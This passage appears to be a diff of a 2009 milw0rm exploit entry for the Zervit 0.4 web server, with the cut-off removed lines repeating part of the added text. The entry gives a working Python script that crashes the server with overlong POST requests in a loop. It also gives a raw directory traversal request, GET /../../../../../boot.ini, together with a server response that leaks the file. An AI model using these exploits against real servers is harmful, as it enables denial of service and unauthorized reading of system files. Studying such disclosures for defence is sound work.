deflate, gzip, x-gzip, identity, *;q=0 -Connection: Keep-Alive, TE -TE: deflate, gzip, chunked, identity, trailers -################################################# - -[Response] - -HTTP/1.1 200 OK -Server: Zervit 0.4 -X-Powered-By: Carbono -Connection: close -Accept-Ranges: bytes -Content-Type: application/octet-stream -Content-Length: 355 - -[boot loader] -timeout=30 -default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS -[operating systems] -multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT -################################################## - -# milw0rm.com [2009-05-13] +####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption ######### + + +By: e.wiZz! & shinnai + +Site: shinnai.net & balcansecurity.com + + + +[Memory Corruption] +######################################################################## + +import socket + +host = "127.0.0.1" +port = 8080 + +try: + for i in range(1,10): + buff = "a" * 3330 + request = "POST " + buff + " HTTP/1.0" + connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connection.connect((host, port)) + connection.send(request) +except: + raw_input('\n\nUnable to connect. Press "Enter" to quit...') + + + +[Directory traversal] +################################################################################# + +[Request] + +GET /../../../../../boot.ini HTTP/1.1 +User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1 +Host: localhost:80 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: en-US,en;q=0.9 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 +Connection: Keep-Alive, TE +TE: deflate, gzip, chunked, identity, trailers +################################################# + +[Response] + +HTTP/1.1 200 OK +Server: Zervit 0.4 +X-Powered-By: Carbono +Connection: close +Accept-Ranges: bytes +Content-Type: application/octet-stream +Content-Length: 355 + +[boot loader] +timeout=30 +default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS +[operating systems] +multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT +################################################## + +# milw0rm.com [2009-05-13]